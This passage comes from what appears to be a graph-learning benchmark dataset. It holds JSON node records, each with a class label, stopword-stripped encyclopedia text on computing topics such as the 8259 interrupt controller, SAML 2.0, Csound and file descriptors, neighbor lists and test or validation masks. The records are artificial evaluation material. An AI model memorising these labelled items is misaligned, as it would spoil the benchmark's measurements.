otherwise irq edge triggered mode 8259 generates spurious interrupts response number conditions first irq line deasserted acknowledged may occur due noise irq lines edge triggered mode noise must maintain line low state 100 ns noise diminishes pull-up resistor returns irq line high thus generating false interrupt level triggered mode noise may cause high signal level systems intr line system sends acknowledgment request 8259 nothing resolve thus sends irq7 response first case generate spurious irq7 similar case occur 8259 unmask irq input de-assertion properly synchronized many systems irq input deasserted i/o write processor n't wait write reaches i/o device processor continues unmasks 8259 irq irq input deasserted 8259 assert intr time processor recognizes intr issues acknowledgment read irq 8259 irq input may deasserted 8259 returns spurious irq7 second master 8259 irq2 active high slave 8259 irq lines inactive falling edge interrupt acknowledgment second case generate spurious irq15 rare pc/xt isa system one 8259 controller pc/at later systems two 8259 controllers master slave irq0 irq7 master 8259 interrupt lines irq8 irq15 slave 8259 interrupt lines labels pins 8259 ir0 ir7 irq0 irq15 names isa bus lines 8259s attached",
    "neighbors": [
      1058,
      8090,
      548,
      9861,
      3272,
      6797,
      8301,
      7151,
      5457,
      8625,
      499,
      5368,
      5529,
      602,
      1660,
      3294,
      5823
    ],
    "mask": "Test"
  },
  {
    "node_id": 6807,
    "label": 3,
    "text": "Macintosh_IIfx:macintosh iifx macintosh iifx personal computer designed manufactured sold apple computer inc. march 1990 april 1992 introduction cost depending configuration fastest macintosh available time iifx powerful 68030-based macintosh ii family replaced top apple lineup macintosh quadra 1991 last apple computer released designed using snow white design language dubbed wicked fast product manager frank casanova – came apple apollo computer boston massachusetts boston term wicked commonly used denote anything extreme – iifx runs clock rate 40 megahertz 32 kb level 2 cache six nubus slots includes number proprietary asics coprocessors designed speed machine chips require system-specific drivers 40 mhz speed refers main logic board clock bus motorola 68030 cpu computer motorola 68882 fpu machine eight ram slots maximum 128 mb ram enormous amount time iifx features specialized high-speed 80 ns ram using 64-pin dual-ported simms contemporary macintosh models use 30-pin simms extra pins separate path allow latched read write operations also possible use parity memory modules iifx stock 68k macintosh support along special versions macintosh iici logic board total 8 ram slots must populated four time 1 4 16 mb chips results maximum memory amount 128 mb iifx includes two special dedicated processors floppy disk operations sound adb serial communications i/o chips feature pair 10 mhz embedded 6502 cpus cpu family used apple ii machines iifx uses scsi hard disk interface previous macintosh models since macintosh plus iifx requires special black-colored scsi terminator external drives first introduced iifx offered configurations introduced may 15 1990",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      576,
      1090,
      10833,
      4180,
      10838,
      10840,
      9312,
      8806,
      7281,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      4258,
      7842,
      7844,
      3241,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      11118,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      11171,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      9182,
      2023,
      10734,
      5616,
      10224,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 6808,
    "label": 2,
    "text": "Theodore_Ts'o:theodore ts theodore yue tak ts 曹子德 born 1968 software engineer mainly known contributions linux kernel particular contributions file systems primary developer maintainer e2fsprogs userspace utilities ext2 ext3 ext4 filesystems maintainer ext4 file system ts graduated mit degree computer science 1990 worked mit information systems department 1999 time project leader kerberos v5 team 1994 ts created codice_1 linux device node corresponding kernel driver linux unix first kernel interface provided high quality cryptographic random numbers user programs codice_1 works without access hardware random number generator allowing user programs depend upon existence separate daemons codice_3 take random numbers hardware make accessible via codice_1 since creation codice_1 codice_6 become standard interfaces unix linux bsd macos systems mit ts went work va linux systems two years late 2001 joined ibm worked improvements linux kernel performance scalability working real-time kernel ibm ts joined linux foundation late 2007 two-year fellowship initially served chief platform strategist becoming chief technology officer 2008 ts also served treasurer usenix 2008 chaired annual linux kernel developers summit 2010 ts moved google saying would working kernel file system storage stuff ts debian developer maintaining several packages mostly filesystem-related ones including e2fsprogs since march 2003 member security area directorate internet engineering task force one chairs ipsec working group one founding board members free standards group ts awarded free software foundation 2006 award advancement free software",
    "neighbors": [
      1026,
      3082,
      5644,
      5139,
      2581,
      10780,
      10785,
      9762,
      6691,
      6180,
      2597,
      8242,
      9266,
      2109,
      8772,
      6213,
      10822,
      8263,
      8268,
      589,
      4177,
      8787,
      5222,
      10856,
      7793,
      3189,
      4734,
      7812,
      4238,
      10382,
      8848,
      657,
      2194,
      2195,
      2197,
      2199,
      2711,
      9882,
      1694,
      3742,
      6302,
      8354,
      2723,
      8364,
      1717,
      10933,
      4279,
      5815,
      5822,
      1736,
      2762,
      8909,
      6352,
      3802,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      10482,
      246,
      2294,
      8439,
      2809,
      3323,
      4360,
      4367,
      792,
      7450,
      10016,
      802,
      5410,
      6947,
      295,
      5931,
      823,
      6968,
      7992,
      11069,
      318,
      3911,
      843,
      6988,
      4431,
      10063,
      11602,
      4437,
      5975,
      6489,
      10091,
      1394,
      1396,
      5492,
      7540,
      11643,
      10620,
      8573,
      1406,
      8065,
      8066,
      900,
      5514,
      4493,
      10642,
      1939,
      11155,
      9621,
      3478,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9151,
      10687,
      8130,
      457,
      6098,
      8671,
      7136,
      2529,
      6625,
      9696,
      8676,
      2021,
      11232,
      1513,
      3055,
      5105,
      2036,
      8186,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 6809,
    "label": 1,
    "text": "InterSystems:intersystems intersystems corporation privately held vendor software systems technology high-performance database management rapid application development integration healthcare information systems vendor products include intersystems iris data platform caché database management system intersystems ensemble integration platform healthshare healthcare informatics platform trakcare healthcare information system sold outside united states intersystems based cambridge massachusetts company earned 644 million 2017 intersystems founded 1978 phillip t. terry ragon current ceo 2018 firm one original vendors m-technology aka mumps systems product called ism years acquired several mumps implementations dtm data tree 1993 dsm digital 1995 msm micronetics 1998 making intersystems dominant technology vendor firm eventually started combining features products one called openm consolidated technologies product caché 1997 time stopped new development legacy m-based products although company stills supports existing customers launched ensemble integration platform 2003 healthshare scalable health informatics platform 2006 2007 intersystems purchased trakhealth australian vendor trakcare modular healthcare information system based intersystems technology may 2011 firm launched globals free database based multi-dimensional array storage technology used caché september 2011 intersystems purchased siemens health services shs france parent company siemens september 2017 intersystems announced intersystems iris data platform company said combines database management capabilities together interoperability analytics well technologies sharding performance company products include largest customer intersystems epic leading health records vendor like intersystems epic privately held rooted older programming language called mumps developed mass general hospital 1960s founders coded first products turned outside investors preferring maintain control said zina moukheiber forbes profile 2013 large customers include u.s. department veterans affairs partners healthcare cleveland clinic national health services england scotland wales european space agency credit suisse august 14 2008 boston globe reported intersystems filing lawsuit microsoft corporation another tenant cambridge mass. headquarters seeking prevent microsoft expanding building intersystems also filed lawsuit building owner equity office partners subsidiary blackstone group contending conspired microsoft lease space intersystems rights sought drive rents process 2010 ceo terry ragon led coalition cambridge called save skyline protest city zoning change would allowed signs top commercial buildings partly response microsoft desire put sign top shared building disputes eventually settled microsoft intersystems agreed put low signs front building street level",
    "neighbors": [
      11683,
      7076,
      9828,
      5929,
      8201,
      7149,
      974,
      7412,
      1142
    ],
    "mask": "Test"
  },
  {
    "node_id": 6810,
    "label": 9,
    "text": "Csound:csound csound computer programming language sound also known sound compiler audio programming language precisely audio dsl called csound written c opposed predecessors free software available lgpl csound originally written mit barry vercoe 1985 based earlier system called music 11 turn followed music-n model initiated max mathews bell labs development continued throughout 1990s 2000s led john fitch university bath first documented version 5 release version 5.01 march 18 2006 many developers contributed notably istvan varga gabriel maldonado robin whittle richard karpen michael gogins matt ingalls steven yi richard boulanger victor lazzarini developed many years currently nearly 1700 unit generators one greatest strengths completely modular extensible user csound closely related underlying language structured audio extensions mpeg-4 saol csound takes two specially formatted text files input orchestra describes nature instruments score describes notes parameters along timeline csound processes instructions files renders audio file real-time audio stream output orchestra score files may unified single structured file using markup language tags csd file filename extension .csd simple example unified csound data file produces wave file containing one-second sine wave tone 1 khz sample rate 96 khz many programming languages writing long programs csound eased using integrated environment editing previewing testing debugging one officially supported csoundqt many features automatic code insertion integrated documentation browser integrated widgets graphically controlling parameters realtime plus button playing code version 5.01 released march 18 2006 – 20 years csound first release csound 5 available binary source code linux microsoft windows mac os x sourceforge csound project much improved expanded compared original software effectively made software library api variety front ends developed addition basic c api also python java lisp tcl c++ among bindings like one haskell allows control csound purely functional environment use plug-ins allows additional capabilities without modifications csound code possibility write user-defined opcodes extensions original language ladspa dssi supported vst support removed real-time performance midi added 1990s another addition support fltk widgets graphical interface components sliders knobs etc controlling real-time audio integration custom graphical interfaces written python csound 6 development since features hashed csound conference held 2011 hanover csound 6 released july 2013 available github csound 6 also available android major new features csound 6 include development csound 6 led john ffitch steven yi victor lazzarini currently csound score note events generated real time opposed instruments definable compile time csound first starts csound 6 limitation removed set sound processors defined compiled load time individual processing objects spawned destroyed real time input audio processed real time output generated also real time note events triggered based osc communications within instrument instance spawned midi entered stdin typing terminal sending textual statements another program use csound 5 live performance tool augmented variety third-party software live event sheet within csoundqt used modify score real-time addition interfaces programming languages used script csound paper detailing use csound qt pure data real-time musical synthesis presented 2012 linux audio conference ounk project attempts integrate python csound csoundac provides way algorithmic composition python using csound backend audivation csound live packages various opcodes max/msp wrappers suitable use ableton live csound also available mobile systems ios android csound5 chosen audio/music development system olpc project xo-1 laptop platform",
    "neighbors": [
      7172,
      267,
      8958,
      7571,
      6933,
      791,
      3876,
      10284,
      5037,
      5677,
      7983,
      692,
      9783,
      9023,
      9926,
      3665,
      596,
      11221,
      7769,
      9565,
      6502,
      8554,
      5612,
      7535,
      8947,
      9210,
      2045,
      7550
    ],
    "mask": "None"
  },
  {
    "node_id": 6811,
    "label": 4,
    "text": "SAML_2.0:saml 2.0 security assertion markup language 2.0 saml 2.0 version saml standard exchanging authentication authorization data security domains saml 2.0 xml-based protocol uses security tokens containing assertions pass information principal usually end user saml authority named identity provider saml consumer named service provider saml 2.0 enables web-based cross-domain single sign-on sso helps reduce administrative overhead distributing multiple authentication tokens user saml 2.0 ratified oasis standard march 2005 replacing saml 1.1 critical aspects saml 2.0 covered detail official documents samlcore samlbind samlprof samlmeta 30 individuals 24 companies organizations involved creation saml 2.0 particular special note liberty alliance donated identity federation framework id-ff specification oasis became basis saml 2.0 specification thus saml 2.0 represents convergence saml 1.1 liberty id-ff 1.2 shibboleth 1.3 assertion package information supplies zero statements made saml authority saml assertions usually made subject represented codice_1 element saml 2.0 specification defines three different kinds assertion statements created saml authority saml-defined statements associated subject three kinds statements defined follows important type saml assertion so-called bearer assertion used facilitate web browser sso example short-lived bearer assertion issued identity provider nowiki https //idp.example.org/saml2 /nowiki service provider nowiki https //sp.example.com/saml2 /nowiki assertion includes authentication assertion codice_2 attribute assertion codice_3 presumably service provider uses make access control decision prefix codice_4 represents saml v2.0 assertion namespace note example codice_5 element contains following child elements words assertion encodes following information assertion b07b804c-7c29-ea16-7300-4f3d6f7928ac issued time 2004-12-05t09:22:05z identity provider nowiki https //idp.example.org/saml2 /nowiki regarding subject 3f7b3dcf-1674-4ecd-92c8-1544f346baf8 exclusively service provider nowiki https //sp.example.com/saml2 /nowiki authentication statement particular asserts following principal identified codice_9 element authenticated time 2004-12-05t09:22:00z means password sent protected channel likewise attribute statement asserts principal identified codice_9 element staff member institution following protocols specified samlcore important protocols—the authentication request protocol—is discussed detail saml 1.1 web browser sso profiles idp-initiated unsolicited codice_15 element transmitted identity provider service provider via browser prefix codice_16 denotes saml protocol namespace saml 2.0 however flow begins service provider issues explicit authentication request identity provider resulting authentication request protocol significant new feature saml 2.0 principal entity acting principal behalf wishes obtain assertion containing authentication statement codice_17 element transmitted identity provider codice_17 element implicitly requests assertion containing authentication statement evidently issued service provider nowiki https //sp.example.com/saml2 /nowiki subsequently presented identity provider via browser identity provider authenticates principal necessary issues authentication response transmitted back service provider via browser saml message transmitted one entity another either value reference reference saml message called artifact receiver artifact resolves reference sending codice_19 request directly issuer artifact responds actual message referenced artifact suppose example identity provider sends following codice_19 request directly service provider via back channel response service provider returns saml element referenced enclosed artifact protocol forms basis http artifact binding bindings supported saml 2.0 outlined bindings specification samlbind web browser sso http redirect binding http post binding commonly used example service provider may use http redirect send request identity provider uses http post transmit response example illustrates entity choice binding independent partner choice binding saml protocol messages carried directly url query string http get request since length urls limited practice http redirect binding suitable short messages codice_17 message longer messages e.g containing signed encrypted saml assertions saml responses usually transmitted via bindings http post binding saml requests responses transmitted via http redirect codice_22 codice_23 query string parameter respectively sent message deflated without header checksum base64-encoded url-encoded order upon receipt process reversed recover original message example encoding codice_17 message yields message formatted readability may signed additional security practice data contained codice_17 codice_26 contains sp id codice_27 agreed idp sp beforehand via manual information exchange via saml metadata case signing request security constraint codice_17 contains information known idp beforehand assertion consumer service url signing request recommended security purposes following example service provider identity provider use http post binding initially service provider responds request user agent document containing xhtml form value codice_22 parameter base64-encoding codice_17 element transmitted identity provider via browser sso service identity provider validates request responds document containing another xhtml form value codice_23 parameter base64 encoding codice_15 element likewise transmitted service provider via browser automate submission form following line javascript may appear anywhere xhtml page assumes course first form element page contains samlresponse containing codice_33 element codice_34 http artifact binding uses artifact resolution protocol saml soap binding http resolve saml message reference consider following specific example suppose service provider wants send codice_17 message identity provider initially service provider transmits artifact identity provider via http redirect next identity provider sends codice_19 request artifactresolverequest shown earlier directly service provider via back channel finally service provider returns codice_37 element containing referenced codice_17 message course flow go direction well identity provider may issue artifact fact common see example double artifact profile example later topic general saml 2.0 artifact defined follows samlbind thus saml 2.0 artifact consists three components two-byte codice_39 two-byte codice_40 arbitrary sequence bytes called codice_41 three pieces information concatenated base64-encoded yield complete artifact codice_39 uniquely identifies artifact format saml 2.0 predefines one artifact type 0x0004 codice_40 reference particular artifact resolution endpoint managed artifact issuer may either idp sp mentioned earlier codice_41 determined type definition meat artifact format type 0x0004 artifact defined follows thus type 0x0004 artifact size 44 bytes unencoded codice_45 arbitrary sequence bytes although practice codice_45 sha-1 hash issuer entityid codice_47 random sequence bytes references saml message artifact issuer willing produce on-demand example consider hex-encoded type 0x0004 artifact look closely see codice_39 0x0004 codice_40 0x0000 front artifact next 20 bytes sha-1 hash issuer entityid nowiki https //idp.example.org/saml2 /nowiki followed 20 random bytes base64-encoding 44 bytes see artifactresolverequest example saml 2.0 saml 1.1 primary use case still web browser sso scope saml 2.0 broader previous versions saml suggested following exhaustive list profiles although number supported profiles quite large profiles specification samlprof simplified since binding aspects profile factored separate bindings specification samlbind saml 2.0 specifies web browser sso profile involving identity provider idp service provider sp principal wielding http user agent service provider four bindings choose identity provider three leads twelve 12 possible deployment scenarios outline three deployment scenarios one common scenarios service provider sends saml request idp sso service using http-redirect binding identity provider returns saml response sp assertion consumer service using http-post binding message flow begins request secured resource service provider 1 request target resource sp principal via http user agent requests target resource service provider service provider performs security check behalf target resource valid security context service provider already exists skip steps 2–7 service provider may use kind mechanism discover identity provider used e.g. ask user use preconfigured idp etc 2 redirect idp sso service service provider generates appropriate samlrequest relaystate redirects browser idp sso service using standard http 302 redirect codice_50 token opaque reference state information maintained service provider value codice_22 parameter deflated base64-encoded url-encoded value codice_17 element samlrequest may signed using sp signing key typically however necessary 3 request sso service idp user agent issues get request sso service identity provider values codice_22 codice_50 parameters provided redirect sso service identity provider processes codice_17 element url-decoding base64-decoding inflating request order performs security check user valid security context identity provider identifies user mechanism details omitted 4 respond xhtml form sso service validates request responds document containing xhtml form value codice_50 parameter preserved step 3 value codice_23 parameter base64 encoding following codice_15 element 5 request assertion consumer service sp user agent issues post request assertion consumer service service provider values codice_23 codice_50 parameters taken xhtml form step 4 6 redirect target resource assertion consumer service processes response creates security context service provider redirects user agent target resource 7 request target resource sp user agent requests target resource service provider 8 respond requested resource since security context exists service provider returns resource user agent relatively simple deployment saml 2.0 web browser sso profile samlprof service provider sp identity provider idp use http post binding message flow begins request secured resource sp 1 request target resource sp principal via http user agent requests target resource service provider service provider performs security check behalf target resource valid security context service provider already exists skip steps 2–7 2 respond xhtml form service provider responds document containing xhtml form codice_50 token opaque reference state information maintained service provider value codice_22 parameter base64 encoding following codice_17 element codice_17 element inserted xhtml form first base64-encoded 3 request sso service idp user agent issues post request sso service identity provider values codice_22 codice_50 parameters taken xhtml form step 2 sso service processes codice_17 element url-decoding base64-decoding inflating request order performs security check user valid security context identity provider identifies user details omitted 4 respond xhtml form sso service validates request responds document containing xhtml form value codice_50 parameter preserved step 3 value codice_23 parameter base64 encoding following codice_15 element 5 request assertion consumer service sp user agent issues post request assertion consumer service service provider values codice_23 codice_50 parameters taken xhtml form step 4 6 redirect target resource assertion consumer service processes response creates security context service provider redirects user agent target resource 7 request target resource sp user agent requests target resource service provider 8 respond requested resource since security context exists service provider returns resource user agent complex deployment saml 2.0 web browser sso profile samlprof service provider sp identity provider idp use http artifact binding artifacts delivered respective endpoints via http get message flow begins request secured resource sp 1 request target resource sp principal via http user agent requests target resource service provider service provider performs security check behalf target resource valid security context service provider already exists skip steps 2–11 2 redirect single sign-on sso service idp service provider redirects user agent single sign-on sso service identity provider codice_50 parameter codice_74 parameter appended redirect url 3 request sso service idp user agent requests sso service identity provider codice_75 opaque reference state information maintained service provider codice_76 saml artifact issued step 2 4 request artifact resolution service sp sso service dereferences artifact sending codice_19 element bound saml soap message artifact resolution service service provider value codice_78 element saml artifact transmitted step 3 5 respond saml authnrequest artifact resolution service service provider returns codice_37 element containing codice_17 element bound saml soap message sso service identity provider sso service processes codice_17 element performs security check user valid security context identity provider identifies user details omitted 6 redirect assertion consumer service sso service identity provider redirects user agent assertion consumer service service provider previous codice_50 parameter new codice_74 parameter appended redirect url 7 request assertion consumer service sp user agent requests assertion consumer service service provider codice_75 token value step 3 codice_85 saml artifact issued step 6 8 request artifact resolution service idp assertion consumer service dereferences artifact sending codice_19 element bound saml soap message artifact resolution service identity provider value codice_78 element saml artifact transmitted step 7 9 respond saml assertion artifact resolution service identity provider returns codice_37 element containing codice_15 element bound saml soap message assertion consumer service service provider 10 redirect target resource assertion consumer service processes response creates security context service provider redirects user agent target resource 11 request target resource sp user agent requests target resource service provider 12 respond requested resource since security context exists service provider returns resource user agent saml 2.0 identity provider discovery profile introduces following concepts hypothetical example common domain let suppose example uk example.co.uk example deutschland example.de belong virtual organization example global alliance example.com example domain example.com common domain example uk example deutschland presence domain uk.example.com de.example.com resp. common domain cookie secure browser cookie scoped common domain browser user cookie stores history list recently visited idps name value cookie specified idp discovery profile samlprof successful act authentication idp requests common domain cookie writing service service appends idp unique identifier common domain cookie sp receives unauthenticated request protected resource requests common domain cookie reading service discover browser user recently used idp assertion query/request profile general profile accommodates numerous types so-called queries using following saml 2.0 elements saml soap binding often used conjunction queries attribute query perhaps important type saml query often requester acting behalf principal queries identity provider attributes give example query issued principal directly note codice_26 codice_97 case sometimes called attribute self-query identity provider might return following assertion wrapped codice_15 element shown contrast bearerassertion shown earlier assertion longer lifetime corresponding lifetime x.509 certificate principal used authenticate identity provider moreover since assertion signed user push assertion relying party long user prove possession corresponding private key hence name holder-of-key relying party assured assertion authentic quite literally metadata makes saml work work well let look important uses metadata metadata ensures secure transaction identity provider service provider metadata trust information encoded implementation proprietary manner sharing trust information facilitated standard metadata saml 2.0 provides well-defined interoperable metadata format entities leverage bootstrap trust process identity provider publishes data codice_101 element note following details entity descriptor definition identity provider manages sso service supports saml web browser sso profile specified samlprof see example identity provider described codice_107 element shown next section sso service identity provider described codice_107 element previous metadata element describes sso service identity provider note following details element noted beginning section values codice_112 attributes used service provider route saml messages minimizes possibility rogue identity provider orchestrating man-in-the-middle attack like identity provider service provider publishes data codice_101 element note following details entity descriptor definition service provider manages assertion consumer service supports saml web browser sso profile specified samlprof see example service provider described codice_133 element shown next section assertion consumer service contained codice_133 element note following details codice_133 metadata element noted beginning section values codice_112 attributes used identity provider route saml messages minimizes possibility rogue service provider orchestrating man-in-the-middle attack previous examples codice_101 element shown digitally signed practice however multiple codice_101 elements grouped together codice_159 element single digital signature entire aggregate note following details codice_159 element typically metadata aggregates published trusted third parties called federations vouch integrity metadata aggregate note metadata aggregates large composed hundreds even thousands entities per aggregate primary references secondary references deprecated references",
    "neighbors": [
      3521,
      2501,
      7368,
      425,
      8159,
      10829,
      4863,
      820,
      4979,
      6805,
      7320,
      5433,
      90,
      1851,
      2013,
      7198,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 6812,
    "label": 2,
    "text": "Chown:chown command chown abbreviation change owner used unix unix-like operating systems change owner file system files directories unprivileged regular users wish change group membership file may use chgrp ownership file system may altered super-user user give away ownership file even user owns similarly member group change file group id group chown name_of_new_owner file_name",
    "neighbors": [
      2432,
      515,
      9733,
      9735,
      3976,
      521,
      5256,
      6281,
      6664,
      4750,
      8975,
      11663,
      4369,
      5397,
      2198,
      7196,
      4001,
      6138,
      9505,
      2599,
      7847,
      7975,
      8236,
      4398,
      7983,
      1336,
      8504,
      7356,
      3522,
      451,
      1987,
      965,
      2245,
      8517,
      9542,
      5706,
      3659,
      8522,
      1741,
      10967,
      9946,
      6369,
      8675,
      10727,
      6120,
      491,
      8954,
      11249,
      4850,
      5106,
      5492,
      8306,
      8692,
      9204,
      10484,
      506,
      7804,
      5759
    ],
    "mask": "None"
  },
  {
    "node_id": 6813,
    "label": 6,
    "text": "File_descriptor:file descriptor unix related computer operating systems file descriptor fd less frequently fildes abstract indicator handle used access file input/output resource pipe network socket file descriptors form part posix application programming interface file descriptor non-negative integer generally represented c programming language type negative values reserved indicate value error condition unix process except perhaps daemon expect three standard posix file descriptors corresponding three standard streams traditional implementation unix file descriptors index per-process maintained kernel turn indexes system-wide table files opened processes called table records mode file resource opened reading writing appending possibly modes also indexes third table called inode table describes actual underlying files perform input output process passes file descriptor kernel system call kernel access file behalf process process direct access file inode tables linux set file descriptors open process accessed path codice_1 pid process identifier unix-like systems file descriptors refer unix file type named file system well regular files includes directories block character devices also called special files unix domain sockets named pipes file descriptors also refer objects normally exist file system anonymous pipes network sockets file data structure c standard i/o library usually includes low level file descriptor object question unix-like systems overall data structure provides additional abstraction instead known file handle following lists typical operations file descriptors modern unix-like systems functions declared codice_2 header codice_3 header instead function used perform various operations file descriptor depending command argument passed commands get set attributes associated file descriptor including series new operations file descriptors added many modern unix-like systems well numerous c libraries standardized future version posix codice_4 suffix signifies function takes additional first argument supplying file descriptor relative paths resolved forms lacking codice_4 suffix thus becoming equivalent passing file descriptor corresponding current working directory purpose new operations defend certain class tocttou attacks unix file descriptors behave many ways capabilities passed processes across unix domain sockets using codice_6 system call note however actually passed reference open file description mutable state file offset file status access flags complicates secure use file descriptors capabilities since programs share access open file description interfere use changing offset whether blocking non-blocking example operating systems specifically designed capability systems rarely mutable state associated capability unix process file descriptor table example c-list",
    "neighbors": [
      7196,
      9762,
      6180,
      5158,
      7728,
      52,
      10813,
      5697,
      10835,
      8298,
      9840,
      3700,
      9872,
      4764,
      10407,
      1193,
      3766,
      5815,
      8386,
      716,
      2253,
      7884,
      10959,
      6358,
      728,
      10971,
      8414,
      4320,
      2786,
      9444,
      4333,
      242,
      8447,
      256,
      3330,
      778,
      8975,
      2322,
      5397,
      792,
      8988,
      4902,
      7975,
      8499,
      1332,
      1844,
      823,
      7480,
      9533,
      8516,
      4423,
      3914,
      8012,
      8524,
      11596,
      5969,
      10068,
      5975,
      9054,
      6498,
      4968,
      5483,
      4972,
      5492,
      7540,
      10614,
      2936,
      5503,
      2432,
      2951,
      5514,
      3999,
      10146,
      9637,
      2479,
      7091,
      7603,
      9151,
      3522,
      4034,
      6624,
      9188,
      1509,
      2021,
      8679,
      3562,
      4589,
      6126,
      7663,
      3571,
      2555,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6814,
    "label": 4,
    "text": "Nadim_Kobeissi:nadim kobeissi nadim kobeissi computer science researcher specialized applied cryptography professor new york university paris campus author cryptocat open-source encrypted web chat client kobeissi also known speaking publicly internet censorship internet surveillance kobeissi born beirut lebanon studied lebanese american university beirut 2008–2009 graduated degree philosophy concordia university montreal 2013 kobeissi ph.d. student studying applied cryptography french institute research computer science automation inria france 2015 2018 kobeissi primary author cryptocat project discontinued 2019 2015 kobeissi became active researching formal verification cryptographic protocols december 2018 defended ph.d. thesis formal verification real-world cryptographic protocols implementations vérification formelle des protocoles et des implementations cryptographiques 2010 kobeissi early supporter bradley manning support network organized march montreal december year support wikileaks ran wikileaks mirror site defended wikileaks various canadian news publications 2011 2012 kobeissi hosted chomp.fm radio program internet activism ran weekly montreal ckut-fm radio station show included guests electronic frontier foundation eff security researcher bruce schneier journalist glenn greenwald 2013 kobeissi led effort known skype open letter brought together forty organizations including electronic frontier foundation reporters without borders open technology institute calling microsoft skype release transparency reports regarding skype monitoring surveillance effort successful microsoft released first transparency report shortly letter published",
    "neighbors": [
      1315,
      5813
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6815,
    "label": 3,
    "text": "Superscalar_processor:superscalar processor superscalar processor cpu implements form parallelism called instruction-level parallelism within single processor contrast scalar processor execute one single instruction per clock cycle superscalar processor execute one instruction clock cycle simultaneously dispatching multiple instructions different execution units processor therefore allows throughput number instructions executed unit time would otherwise possible given clock rate execution unit separate processor core processor multi-core processor execution resource within single cpu arithmetic logic unit flynn taxonomy single-core superscalar processor classified sisd processor single instruction stream single data stream though single-core superscalar processor supports short vector operations could classified simd single instruction stream multiple data streams multi-core superscalar processor classified mimd processor multiple instruction streams multiple data streams superscalar cpu typically also pipelined superscalar pipelining execution considered different performance enhancement techniques former executes multiple instructions parallel using multiple execution units whereas latter executes multiple instructions execution unit parallel dividing execution unit different phases superscalar technique traditionally associated several identifying characteristics within given cpu seymour cray cdc 6600 1966 often mentioned first superscalar design 1967 ibm system/360 model 91 another superscalar mainframe motorola mc88100 1988 intel i960ca 1989 amd 29000-series 29050 1990 microprocessors first commercial single-chip superscalar microprocessors risc microprocessors like first superscalar execution risc architectures free transistors die area used include multiple execution units risc designs faster cisc designs 1980s 1990s except cpus used low-power applications embedded systems battery-powered devices essentially general-purpose cpus developed since 1998 superscalar p5 pentium first superscalar x86 processor nx586 p6 pentium pro amd k5 among first designs decode x86-instructions asynchronously dynamic microcode-like micro-op sequences prior actual execution superscalar microarchitecture opened dynamic scheduling buffered partial instructions enabled parallelism extracted compared rigid methods used simpler p5 pentium also simplified speculative execution allowed higher clock frequencies compared designs advanced cyrix 6x86 simplest processors scalar processors instruction executed scalar processor typically manipulates one two data items time contrast instruction executed vector processor operates simultaneously many data items analogy difference scalar vector arithmetic superscalar processor mixture two instruction processes one data item multiple execution units within cpu thus multiple instructions processing separate data items concurrently superscalar cpu design emphasizes improving instruction dispatcher accuracy allowing keep multiple execution units use times become increasingly important number units increased early superscalar cpus would two alus single fpu later design powerpc 970 includes four alus two fpus two simd units dispatcher ineffective keeping units fed instructions performance system better simpler cheaper design superscalar processor usually sustains execution rate excess one instruction per machine cycle merely processing multiple instructions concurrently make architecture superscalar since pipelined multiprocessor multi-core architectures also achieve different methods superscalar cpu dispatcher reads instructions memory decides ones run parallel dispatching one several execution units contained inside single cpu therefore superscalar processor envisioned multiple parallel pipelines processing instructions simultaneously single instruction thread available performance improvement superscalar techniques limited three key areas existing binary executable programs varying degrees intrinsic parallelism cases instructions dependent executed simultaneously cases inter-dependent one instruction impacts either resources results instructions codice_1 run parallel none results depend calculations however instructions codice_2 might runnable parallel depending order instructions complete move units number simultaneously issued instructions increases cost dependency checking increases extremely rapidly exacerbated need check dependencies run time cpu clock rate cost includes additional logic gates required implement checks time delays gates research shows gate cost cases may formula_1 gates delay cost formula_2 formula_3 number instructions processor instruction set formula_4 number simultaneously dispatched instructions even though instruction stream may contain inter-instruction dependencies superscalar cpu must nonetheless check possibility since assurance otherwise failure detect dependency would produce incorrect results matter advanced semiconductor process fast switching speed places practical limit many instructions simultaneously dispatched process advances allow ever greater numbers execution units e.g. alus burden checking instruction dependencies grows rapidly complexity register renaming circuitry mitigate dependencies collectively power consumption complexity gate delay costs limit achievable superscalar speedup roughly eight simultaneously dispatched instructions however even given infinitely fast dependency checking logic otherwise conventional superscalar cpu instruction stream many dependencies would also limit possible speedup thus degree intrinsic parallelism code stream forms second limitation collectively limits drive investigation alternative architectural changes long instruction word vliw explicitly parallel instruction computing epic simultaneous multithreading smt multi-core computing vliw burdensome task dependency checking hardware logic run time removed delegated compiler explicitly parallel instruction computing epic like vliw extra cache prefetching instructions simultaneous multithreading smt technique improving overall efficiency superscalar processors smt permits multiple independent threads execution better utilize resources provided modern processor architectures superscalar processors differ multi-core processors several execution units entire processors single processor composed finer-grained execution units alu integer multiplier integer shifter fpu etc may multiple versions execution unit enable execution many instructions parallel differs multi-core processor concurrently processes instructions multiple threads one thread per processing unit called core also differs pipelined processor multiple instructions concurrently various stages execution assembly-line fashion various alternative techniques mutually exclusive—they frequently combined single processor thus multicore cpu possible core independent processor containing multiple parallel pipelines pipeline superscalar processors also include vector capability",
    "neighbors": [
      4098,
      7173,
      6151,
      9739,
      528,
      2066,
      7699,
      2071,
      5655,
      1563,
      10779,
      10781,
      1057,
      6181,
      8231,
      6184,
      3630,
      9774,
      4144,
      2097,
      6705,
      7218,
      2620,
      2623,
      2113,
      7234,
      1606,
      3142,
      4172,
      2638,
      10837,
      2140,
      9309,
      7263,
      1122,
      4194,
      7270,
      3175,
      5223,
      6247,
      8810,
      4205,
      6253,
      8815,
